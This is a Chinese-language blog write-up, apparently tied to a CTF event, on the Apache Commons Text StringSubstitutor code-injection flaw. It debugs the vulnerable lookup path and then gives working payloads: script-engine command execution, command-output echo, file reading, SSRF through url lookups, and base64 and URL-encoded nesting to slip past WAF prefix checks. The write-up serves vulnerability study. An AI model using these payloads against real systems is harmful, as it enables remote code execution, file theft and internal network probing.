打 rwctf 体验赛遇到的, 顺带写一下
总体感觉跟 log4j2 jndi 注入的利用方式很像, 毕竟都是 apache 的库
漏洞分析
The Commons Text library provides additions to the standard JDK’s text handling. Our goal is to provide a consistent set of tools for processing text generally from computing distances between Strings to being able to efficiently do String escaping of various type
官方文档: https://commons.apache.org/proper/commons-text/userguide.html
影响版本: 1.5.0 - 1.9
添加依赖
1
2
3
4
5
|
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.9</version>
</dependency>
|
demo
1
2
3
4
5
6
7
8
9
10
11
12
|
package com.example;
import org.apache.commons.text.StringSubstitutor;
public class Demo {
public static void main(String[] args) throws Exception{
StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String code = "${script:js:java.lang.Runtime.getRuntime().exec(\"calc\")}";
String res = interpolator.replace(code);
System.out.println(res);
}
}
|
data:image/s3,"s3://crabby-images/69c80/69c8063d08ba302fdd32a190247f1789291b4e8e" alt=""
在 interpolator.replace(code)
处打个断点开始调试
首先进入 StringSubstitutor#replace
data:image/s3,"s3://crabby-images/2b305/2b30544428aa1e1cbbc0e42c28f00ebe1847cc39" alt=""
跟进 substitute 方法
data:image/s3,"s3://crabby-images/30893/308939199e6a7bcb4aab156dc2778c37e329cfd6" alt=""
prefixMatcher 和 suffixMacher 分别为 ${
和 }
, 用于标记插值表达式
valueDelimMatcher 的值为 :-
, 这里我一开始以为它能够跟 log4j2 一样通过 ${a:-j}ndi
来拼接关键词, 但后来发现实际上并不支持这种使用方式, 一时半会也没想出来怎么去利用…
后面是一堆循环和 if 来解析表达式
data:image/s3,"s3://crabby-images/81a60/81a6071f9de25cc598f3a30e2daef50058f16ced" alt=""
然后会来到 this.resolveVariable
这个方法
data:image/s3,"s3://crabby-images/ba2c3/ba2c39ca4bf0645330b48ff1553069b70a1e1a35" alt=""
这里有一个 stringLookupMap, 里面对应了很多 lookup class, 后续利用也都是从这些 class 来入手
data:image/s3,"s3://crabby-images/07ffc/07ffc5c35e9eaf628923dd3e92d7463544d58cb9" alt=""
默认的 InterpolatorStringLookup 会截取 prefix, 然后从 stringLookupMap 中取得对应的 lookup class 并调用其 lookup 方法
data:image/s3,"s3://crabby-images/4d1af/4d1afd12b487129324a970a8542a3b8acee88440" alt=""
ScriptStringLookup 会截取 engineName 和 script, 然后创建对应的 ScriptEngine
在 return 的时候会调用 scriptEngine.eval(script)
从而造成任意代码执行
利用方式
官方文档中给出的几种 lookup 方式
https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html
https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/lookup/StringLookupFactory.html
data:image/s3,"s3://crabby-images/fdb34/fdb34ca9202841a4fccfcc34f5ced0c45e122c5d" alt=""
data:image/s3,"s3://crabby-images/cc783/cc78304f0f6ffb1b54a77c94547472636f7da8a7" alt=""
基本所有的利用方法都已经在这篇文章里面给出了, 总结的很全
https://forum.butian.net/share/1973
下面就举出几个常用的 lookup class 来分析一下
ScriptStringLookup
很简单的利用 ScriptEngineManager 来执行命令, 上面已经分析过了
data:image/s3,"s3://crabby-images/270de/270de19506a3013e9f42168c5eb2b6da64d4f7a4" alt=""
常规的弹计算器
1
|
${script:js:java.lang.Runtime.getRuntime().exec("calc")}
|
结合 Scanner 或者 BufferedReader 实现回显
1
2
3
|
${script:js:new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder("whoami").start().getInputStream(), "GBK")).readLine()} // 只能读取一行
${script:js:new java.util.Scanner(new java.lang.ProcessBuilder("ipconfig").start().getInputStream(), "GBK").useDelimiter("xzxzxz").next()}
|
注意类名要写全 (包括 java.lang
)
ResourceBundleStringLookup
ResourceBundle 的利用方式最初是在浅蓝师傅的这篇文章中学到的
https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg
利用它可以读取 classpath 下的 .properties
配置文件, 无需知道绝对路径
一个很经典的例子就是 springboot 的 application.properties
文件
1
|
${resourcebundle:application:user.name}
|
data:image/s3,"s3://crabby-images/17da7/17da758b7341a2d2c71e8639f191aa4aea79b98d" alt=""
FileStringLookup
读取文件
需要指定 charsetname
data:image/s3,"s3://crabby-images/93cb4/93cb48926d041c8a196ad807599b7619693bea94" alt=""
1
|
${file:utf-8:d:/test.txt}
|
data:image/s3,"s3://crabby-images/1972a/1972a4a238830217a5e71c89299461d74b6a0701" alt=""
UrlStringLookup
发起 url 请求
同样需要指定 charsetname
data:image/s3,"s3://crabby-images/fb714/fb714b43582a7d23be5c84c1c836d4ac812c657a" alt=""
可以利用 http 和 file 协议, 造成 ssrf 或者读取本地文件
1
2
3
|
${url:utf-8:http://127.0.0.1:8000/}
${url:utf-8:file:///d:/test.txt}
|
data:image/s3,"s3://crabby-images/bea87/bea87dd7ae5da4a8ac5145efbc32b3fd30ab24d0" alt=""
编码绕过
主要利用 urlDecoder 和 base64Decoder
data:image/s3,"s3://crabby-images/00ba5/00ba5f5f03c14ce946273fd4c6cb927f7f6210d5" alt=""
data:image/s3,"s3://crabby-images/baf3b/baf3bfec2c5d0b9a0d4f21f1e8549f4b5b195afc" alt=""
原因在于 StringSubstitutor#substitute
支持递归解析
data:image/s3,"s3://crabby-images/7cc08/7cc08489ec9c9fb3db731feb0d64512305711add" alt=""
所以可以利用编码 + 嵌套的方式来绕过某些 waf 对 prefix 的检测
base64Decoder
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
package com.example;
import org.apache.commons.text.StringSubstitutor;
import java.util.Base64;
public class Demo {
public static void main(String[] args) throws Exception{
StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String code = "${script:js:java.lang.Runtime.getRuntime().exec(\"calc\")}";
String poc = "${base64Decoder:" + Base64.getEncoder().encodeToString(code.getBytes()) + "}";
String res = interpolator.replace(poc);
System.out.println(res);
}
}
|
1
|
${base64Decoder:JHtzY3JpcHQ6anM6amF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoImNhbGMiKX0=}
|
data:image/s3,"s3://crabby-images/59311/59311d7a8136e344cba94df70f43ceecca3738db" alt=""
urlDecoder
1
|
${urlDecoder:%24%7b%73%63%72%69%70%74%3a%6a%73%3a%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%7d}
|
data:image/s3,"s3://crabby-images/3acbd/3acbdac64b34cb9fc764584276f90bb917def5dd" alt=""
当然多套几层也是可以的
参考文章
https://paper.seebug.org/2025/
https://paper.seebug.org/1993/
https://forum.butian.net/share/1973
https://blog.csdn.net/qq_34101364/article/details/127338170